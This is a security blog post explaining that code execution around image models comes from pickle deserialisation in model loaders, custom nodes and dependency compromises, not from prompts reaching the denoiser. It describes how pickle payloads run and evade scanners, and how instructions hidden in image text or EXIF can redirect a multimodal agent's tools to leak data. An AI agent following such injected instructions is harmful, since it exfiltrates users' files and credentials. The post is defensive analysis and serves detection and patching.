RC RANDOM CHAOS

torch.load runs attacker code before the first denoising step

A diffusion inpainting model can't execute a prompt. The real RCE is pickle deserialisation in the loader, custom nodes, and the agent around it.

· 7 min read
torch.load runs attacker code before the first denoising step

“Moebius 02b” is a diffusion inpainting model. The “10B-level performance” claim describes output quality at a fraction of the parameter count. Neither figure has anything to do with prompt injection, code execution, or data exfiltration. A denoising network does not parse instructions. It maps a conditioning vector and Gaussian noise to pixels across a fixed number of sampling steps. There is no interpreter, no eval, no command dispatch in the loop. A prompt that reaches the UNet changes the image. It does not change control flow. Conflating generation quality with a code-execution primitive is a category error, and it sends defenders to the wrong layer.

The compromise vector for an image model is not the text reaching the cross-attention blocks. It is the pipeline that deserialises the weights and the orchestrator that calls the model as a tool. That is where arbitrary code runs. That is where credentials sit. The denoiser is the one part of this system that cannot be made to execute a command.

Start with how a checkpoint loads. PyTorch .ckpt, .pt, and .bin files are Python pickle streams. torch.load calls pickle.load. Pickle is a stack-based virtual machine with opcodes, and it is not a data format - it is a program. The REDUCE opcode invokes a callable with attacker-chosen arguments. A crafted object’s reduce method returns (os.system, (“command”,)). The unpickler executes it during deserialisation - before the first denoising step, before the weights are resident on the GPU. This is CWE-502, deserialisation of untrusted data. It is the most reliable code-execution primitive in the machine-learning supply chain.

The opcodes make scanning hard. GLOBAL and STACK_GLOBAL import an arbitrary module attribute by name, so the malicious callable need never appear as a literal string. Static scanners - picklescan, fickling - match known-bad imports and opcode patterns, and crafted streams evade them with indirection through builtins or codecs. A scanner that passes a checkpoint is not a proof of safety. It is the absence of a signature match.

The same class lives in higher-level loaders. CVE-2024-3660, CVSS 9.8, is arbitrary code execution in Keras through Lambda layers. A Lambda layer serialises Python via the marshal module. load_model deserialises and runs it. A trojanised model in legacy H5 or SavedModel format executes on load with the privileges of the loading process. Keras 2.13 set safe_mode=True by default. JFrog then demonstrated a safe_mode bypass - the mitigation is necessary, not sufficient, and the version that fixes the bypass is the one that counts.

The serving layer carries it too. CVE-2024-50050 in Meta’s llama-stack is deserialisation of untrusted data through pyzmq’s recv_pyobj, which pickles automatically. It is reachable across the network against an exposed inference socket - MITRE T1190, exploitation of a public-facing application, with no authentication in the path. Snyk scored it 9.3 under CVSS 4.0 and 9.8 under CVSS 3.1. Meta scored it 6.3. The dispute is about reachability, not mechanism. The mechanism is pickle. Meta replaced it with a type-safe Pydantic JSON implementation in 0.0.41. The pattern repeats across the stack because pickle is the default serialiser and convenience won every design review.

The exploit path for an image model has three entry points. None require touching the diffusion math.

First, the weight file. An attacker publishes a model - a base checkpoint, a fine-tune, a LoRA - on a public hub. Naming it after a model with reputation, “Moebius 02b,” is the social-engineering layer. The victim pulls it and loads it with torch.load or a framework load_model. The reduce payload fires at deserialisation. Code runs in the serving process. That process holds what matters: object-store tokens for the weights bucket, the inference API key, GPU host credentials, environment variables carrying database strings. Exfiltration is one outbound request. This maps to MITRE T1195.002, supply-chain compromise of software dependencies, then T1059.006 for Python execution and T1552.001 for credentials in files and environment.

Second, the extension. ComfyUI and comparable inpainting front-ends load custom nodes - arbitrary Python executed in the server process at startup. The trust model is install-and-run. The Ultralytics compromise of December 2024 sat directly in this tree. Versions 8.3.41 and 8.3.42 shipped an XMRig Monero miner, pushed through a GitHub Actions script injection - a pull_request_target workflow that evaluated an attacker-controlled branch name. ComfyUI-Impact-Pack depends on Ultralytics. The clean releases were 8.3.43 and 8.3.44. The payload was reintroduced in 8.3.45 and 8.3.46. A version range protected no one. Only an exact pinned hash did.

Third, dependency confusion. PyTorch-nightly pulled a malicious torchtriton from PyPI between 25 and 30 December 2022, because pip resolved the public index ahead of the private one. The package gathered system information and files and exfiltrated them over encrypted DNS to *.h4ck.cfd, with anti-VM checks and the payload contained in an ELF binary. Same outcome - code in the build or serving context, credentials and files out the door. The legitimate package was renamed pytorch-triton to break the name collision.

Where prompt injection genuinely applies is one layer up, and it is not the denoiser. When an image model sits behind an agentic multimodal system, the orchestrating language model is the target. Instructions embedded in an image - rendered text, EXIF fields, alt-text - get read by a vision-language model that holds tools. That is indirect prompt injection, OWASP LLM01. The injected text redirects the agent’s tool calls: read a file, request an internal URL, return context to an attacker endpoint. The diffusion model is incidental. The exfiltration runs through the agent’s HTTP and filesystem tools, never through a pixel the inpainting network produced. The cross-attention layers see the conditioning embedding and nothing else. Calling this a flaw “in the generation process” misattributes it. The generation process is downstream of the component under attack.

No public CVE pins “Moebius 02b” to in-the-wild exploitation. Treat the name as a release, not a known-compromised artifact. The campaigns that are documented are the supply-chain ones - torchtriton, Ultralytics, and the trojanised models that JFrog and HiddenLayer catalogued on Hugging Face, more than a hundred carrying pickle payloads. The actors are opportunistic. The tooling is XMRig and commodity stealers. The entry point is the load step, never the sampling loop. The common thread is a loader that treats a downloaded artifact as data when it is code, and a publisher namespace that anyone can populate with a familiar name.

In telemetry the pickle-on-load path is loud when the payload spawns a child. Sysmon Event ID 1 shows a process-create with python as parent and sh, bash, curl, or a miner binary as child. Sysmon Event ID 3 shows the inference worker opening a network connection to a destination that is neither a package registry nor a model bucket. Sysmon Event ID 22 catches the torchtriton style - DNS queries to high-entropy subdomains, long encoded labels, an uncommon TLD. EDR flags the unexpected child of a model-server process and the parent-child lineage python to shell. Those detections fire when the payload does something coarse.

The gap is the quiet payload. Code that runs in-process, opens one HTTPS connection to a host resembling legitimate object storage, ships a token, and returns control leaves almost nothing behind. Loading a model is expected to read multi-gigabyte files, saturate the GPU, and reach the network for weights. Malicious behaviour hides inside that baseline. The indirect prompt-injection path is worse for the defender - host EDR sees nothing, because nothing exec’s. The only evidence lives in application logs: the orchestrator’s tool-invocation trace, egress to an unexpected URL, model output containing data that was never in the prompt. That is a SIEM correlation problem on agent egress, not an endpoint-detection problem, and most pipelines do not log tool calls at all.

The patch boundaries are specific. llama-stack at or above 0.0.41 removes the pyzmq pickle path. Keras at or above 2.13 sets safe_mode=True, with the caveat that a bypass was published - the safe version is the one that postdates the bypass fix, not 2.13 itself. Ultralytics 8.3.43 and 8.3.44 are clean; 8.3.45 and 8.3.46 are not, which is the case for pinning a hash and not a range. The structural fix for weights is format. safetensors stores tensors as a flat buffer with a JSON header and no executable opcodes, which removes the deserialisation primitive for the model file. It does nothing for custom nodes, the serving framework, or the agent. Signed weights through Sigstore or an equivalent attestation close the publisher-trust gap that naming alone exploits.

The residual exposure after all of it: the parameter count of an inpainting model is not a security property. A 0.2B model and a 10B model load through the same pickle path and run the same custom nodes under the same process credentials. Prompt injection against the denoiser is not a code-execution primitive and never was. The execution lives in the loader and the orchestrator. Defence belongs there - hash and signature verification on every weight and dependency, safetensors for storage, a non-pickle serialiser at the serving boundary, least-privilege credentials on the inference process, and egress monitoring on the agent. The model generates pixels. The pipeline around it is what gets owned.

See also: NordVPN for tunneled traffic when operating outside controlled networks.


#ad Contains an affiliate link.

Share

Keep Reading

Stay in the loop

New writing delivered when it's ready. No schedule, no spam.